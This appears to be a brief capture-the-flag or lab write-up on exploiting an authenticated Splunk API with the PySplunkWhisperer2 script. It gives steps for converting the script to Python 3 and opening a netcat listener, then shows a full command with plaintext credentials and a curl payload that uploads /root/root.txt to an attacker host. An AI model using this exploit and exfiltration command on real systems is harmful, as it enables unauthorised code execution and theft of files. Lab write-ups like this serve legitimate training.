Splunk Wispherer
Overview #
Authenticated attacker can send malicuous package to splunk API and execute it. This can be done remotely or locally.
Using python3 on local exploit #
- Convert this exploit into python3
# replace functions
raw_input() --> input()
print "some text" --> print("some text")
- Open netcat listener on attacker machine to receive the output
- Upload exploit to victim machine and run
python3 PySplunkWhisperer2_local.py --port 8089 --username shaun --password Guitar123 --payload "curl -F 'data=@/root/root.txt' http://10.10.14.26:4444"
- Sample execution